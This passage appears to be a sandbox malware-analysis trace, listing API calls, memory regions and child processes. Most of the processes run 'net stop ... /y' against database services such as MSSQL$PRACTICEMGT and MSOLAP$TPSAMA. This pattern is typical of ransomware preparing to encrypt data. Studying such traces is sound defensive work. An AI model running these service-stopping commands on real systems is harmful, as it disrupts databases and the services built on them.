0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7252 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7253 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7254 start_va = 0xffb60000 end_va = 0xffb92fff entry_point = 0xffb60000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7255 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7256 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7257 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7258 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7259 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 7260 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7261 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7285 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7286 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7287 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7288 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7289 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 7290 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7291 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7292 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7293 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7294 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7295 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7296 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7297 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7298 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7299 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7300 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7301 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7302 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7303 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7304 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7305 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7306 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7307 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7309 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 611 os_tid = 0x9c8 [0102.256] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afa50 | out: lpSystemTimeAsFileTime=0x1afa50*(dwLowDateTime=0xf21d77b0, dwHighDateTime=0x1d48689)) [0102.256] GetCurrentProcessId () returned 0xa5c [0102.256] GetCurrentThreadId () returned 0x9c8 [0102.256] GetTickCount () returned 0x23552 [0102.256] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa58 | out: lpPerformanceCount=0x1afa58*=1814917400000) returned 1 [0102.257] GetModuleHandleW (lpModuleName=0x0) returned 0xffb60000 [0102.257] __set_app_type (_Type=0x1) [0102.257] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb79c9c) returned 0x0 [0102.257] __getmainargs (in: _Argc=0xffb84780, _Argv=0xffb84790, _Env=0xffb84788, _DoWildCard=0, _StartInfo=0xffb8479c | out: _Argc=0xffb84780, _Argv=0xffb84790, _Env=0xffb84788) returned 0 [0102.257] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0102.257] GetConsoleOutputCP () returned 0x1b5 [0102.258] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb8cec0 | out: lpCPInfo=0xffb8cec0) returned 1 [0102.258] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0102.261] sprintf_s (in: _DstBuf=0x1af9f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0102.261] setlocale (category=0, locale=".437") returned="English_United States.437" [0102.262] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.262] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0102.262] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$SYSTEM_BGC /y" [0102.262] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af790, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0102.263] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0102.263] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af9e8 | out: Buffer=0x1af9e8*=0x304d60) returned 0x0 [0102.263] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af9e8 | out: Buffer=0x1af9e8*=0x30c120) returned 0x0 [0102.263] _fileno (_File=0x7fefdba2a80) returned 0 [0102.263] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0102.263] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0102.263] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0102.263] _wcsicmp (_String1="config", _String2="stop") returned -16 [0102.263] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0102.263] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0102.263] _wcsicmp (_String1="file", _String2="stop") returned -13 [0102.263] _wcsicmp (_String1="files", _String2="stop") returned -13 [0102.263] _wcsicmp (_String1="group", _String2="stop") returned -12 [0102.263] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0102.263] _wcsicmp (_String1="help", _String2="stop") returned -11 [0102.263] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0102.263] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0102.263] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0102.263] _wcsicmp (_String1="session", _String2="stop") returned -15 [0102.263] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0102.263] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0102.263] _wcsicmp (_String1="share", _String2="stop") returned -12 [0102.263] _wcsicmp (_String1="start", _String2="stop") returned -14 [0102.263] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0102.263] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0102.263] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0102.263] _wcsicmp (_String1="accounts", _String2="MSOLAP$SYSTEM_BGC") returned -12 [0102.263] _wcsicmp (_String1="computer", _String2="MSOLAP$SYSTEM_BGC") returned -10 [0102.264] _wcsicmp (_String1="config", _String2="MSOLAP$SYSTEM_BGC") returned -10 [0102.264] _wcsicmp (_String1="continue", _String2="MSOLAP$SYSTEM_BGC") returned -10 [0102.264] _wcsicmp (_String1="cont", _String2="MSOLAP$SYSTEM_BGC") returned -10 [0102.264] _wcsicmp (_String1="file", _String2="MSOLAP$SYSTEM_BGC") returned -7 [0102.264] _wcsicmp (_String1="files", _String2="MSOLAP$SYSTEM_BGC") returned -7 [0102.264] _wcsicmp (_String1="group", _String2="MSOLAP$SYSTEM_BGC") returned -6 [0102.264] _wcsicmp (_String1="groups", _String2="MSOLAP$SYSTEM_BGC") returned -6 [0102.264] _wcsicmp (_String1="help", _String2="MSOLAP$SYSTEM_BGC") returned -5 [0102.264] _wcsicmp (_String1="helpmsg", _String2="MSOLAP$SYSTEM_BGC") returned -5 [0102.264] _wcsicmp (_String1="localgroup", _String2="MSOLAP$SYSTEM_BGC") returned -1 [0102.264] _wcsicmp (_String1="pause", _String2="MSOLAP$SYSTEM_BGC") returned 3 [0102.264] _wcsicmp (_String1="session", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="sessions", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="sess", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="share", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="start", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="stats", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="statistics", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="stop", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="time", _String2="MSOLAP$SYSTEM_BGC") returned 7 [0102.264] _wcsicmp (_String1="user", _String2="MSOLAP$SYSTEM_BGC") returned 8 [0102.264] _wcsicmp (_String1="users", _String2="MSOLAP$SYSTEM_BGC") returned 8 [0102.264] _wcsicmp (_String1="msg", _String2="MSOLAP$SYSTEM_BGC") returned -8 [0102.264] _wcsicmp (_String1="messenger", _String2="MSOLAP$SYSTEM_BGC") returned -14 [0102.264] _wcsicmp (_String1="receiver", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0102.264] _wcsicmp (_String1="rcv", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0102.264] _wcsicmp (_String1="netpopup", _String2="MSOLAP$SYSTEM_BGC") returned 1 [0102.264] _wcsicmp (_String1="redirector", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0102.264] _wcsicmp (_String1="redir", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0102.264] _wcsicmp (_String1="rdr", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0102.264] _wcsicmp (_String1="workstation", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0102.264] _wcsicmp (_String1="work", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0102.264] _wcsicmp (_String1="wksta", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0102.264] _wcsicmp (_String1="prdr", _String2="MSOLAP$SYSTEM_BGC") returned 3 [0102.264] _wcsicmp (_String1="devrdr", _String2="MSOLAP$SYSTEM_BGC") returned -9 [0102.264] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$SYSTEM_BGC") returned -1 [0102.264] _wcsicmp (_String1="server", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="svr", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="srv", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.264] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$SYSTEM_BGC") returned -1 [0102.264] _wcsicmp (_String1="alerter", _String2="MSOLAP$SYSTEM_BGC") returned -12 [0102.264] _wcsicmp (_String1="netlogon", _String2="MSOLAP$SYSTEM_BGC") returned 1 [0102.265] _wcsupr (in: _String="MSOLAP$SYSTEM_BGC" | out: _String="MSOLAP$SYSTEM_BGC") returned="MSOLAP$SYSTEM_BGC" [0102.265] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x30ce30 [0102.339] GetServiceKeyNameW (in: hSCManager=0x30ce30, lpDisplayName="MSOLAP$SYSTEM_BGC", lpServiceName=0xffb85750, lpcchBuffer=0x1af908 | out: lpServiceName="", lpcchBuffer=0x1af908) returned 0 [0102.340] _wcsicmp (_String1="msg", _String2="MSOLAP$SYSTEM_BGC") returned -8 [0102.340] _wcsicmp (_String1="messenger", _String2="MSOLAP$SYSTEM_BGC") returned -14 [0102.340] _wcsicmp (_String1="receiver", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0102.340] _wcsicmp (_String1="rcv", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0102.340] _wcsicmp (_String1="redirector", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0102.340] _wcsicmp (_String1="redir", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0102.340] _wcsicmp (_String1="rdr", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0102.340] _wcsicmp (_String1="workstation", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0102.340] _wcsicmp (_String1="work", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0102.340] _wcsicmp (_String1="wksta", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0102.340] _wcsicmp (_String1="prdr", _String2="MSOLAP$SYSTEM_BGC") returned 3 [0102.340] _wcsicmp (_String1="devrdr", _String2="MSOLAP$SYSTEM_BGC") returned -9 [0102.340] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$SYSTEM_BGC") returned -1 [0102.340] _wcsicmp (_String1="server", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.340] _wcsicmp (_String1="svr", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.340] _wcsicmp (_String1="srv", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0102.340] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$SYSTEM_BGC") returned -1 [0102.340] _wcsicmp (_String1="alerter", _String2="MSOLAP$SYSTEM_BGC") returned -12 [0102.340] _wcsicmp (_String1="netlogon", _String2="MSOLAP$SYSTEM_BGC") returned 1 [0102.340] NetServiceControl (in: servername=0x0, service="MSOLAP$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x1af910 | out: bufptr=0x1af910) returned 0x889 [0102.341] wcscpy_s (in: _Destination=0xffb880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0102.341] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0102.341] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb85b50, nSize=0x800, Arguments=0xffb87f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0102.343] GetFileType (hFile=0xb) returned 0x2 [0102.343] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af7d8 | out: lpMode=0x1af7d8) returned 1 [0102.343] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb85b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af7d0, lpReserved=0x0 | out: lpBuffer=0xffb85b50*, lpNumberOfCharsWritten=0x1af7d0*=0x1e) returned 1 [0102.343] GetFileType (hFile=0xb) returned 0x2 [0102.343] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af7d8 | out: lpMode=0x1af7d8) returned 1 [0102.344] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af7d0, lpReserved=0x0 | out: lpBuffer=0xffb61efc*, lpNumberOfCharsWritten=0x1af7d0*=0x2) returned 1 [0102.344] _ultow (in: _Dest=0x889, _Radix=1767488 | out: _Dest=0x889) returned="2185" [0102.344] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb85b50, nSize=0x800, Arguments=0xffb87f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0102.344] GetFileType (hFile=0xb) returned 0x2 [0102.344] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af7d8 | out: lpMode=0x1af7d8) returned 1 [0102.344] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb85b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af7d0, lpReserved=0x0 | out: lpBuffer=0xffb85b50*, lpNumberOfCharsWritten=0x1af7d0*=0x34) returned 1 [0102.344] GetFileType (hFile=0xb) returned 0x2 [0102.345] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af7d8 | out: lpMode=0x1af7d8) returned 1 [0102.345] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af7d0, lpReserved=0x0 | out: lpBuffer=0xffb61efc*, lpNumberOfCharsWritten=0x1af7d0*=0x2) returned 1 [0102.345] NetApiBufferFree (Buffer=0x304d60) returned 0x0 [0102.345] NetApiBufferFree (Buffer=0x30c120) returned 0x0 [0102.345] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$SYSTEM_BGC /y" [0102.345] exit (_Code=2) Process: id = "175" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x584a8000" os_pid = "0x9c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7310 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7311 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7312 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7313 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 7314 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7315 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7316 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7317 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7318 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7319 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7320 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 7321 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7322 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 7323 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7324 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 612 os_tid = 0x964 Process: id = "176" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x596c8000" os_pid = "0x538" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$PRACTICEMGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7325 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7326 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7327 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 7328 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 7329 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7330 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7331 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7332 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7333 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7334 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7335 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 7336 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7337 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 7338 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7339 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 614 os_tid = 0x24c Process: id = "177" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x58f87000" os_pid = "0x8dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "170" os_parent_pid = "0x9a8" cmd_line = "C:\\Windows\\system32\\net1 stop MSOLAP$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7340 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7341 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7342 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7343 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7344 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7345 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 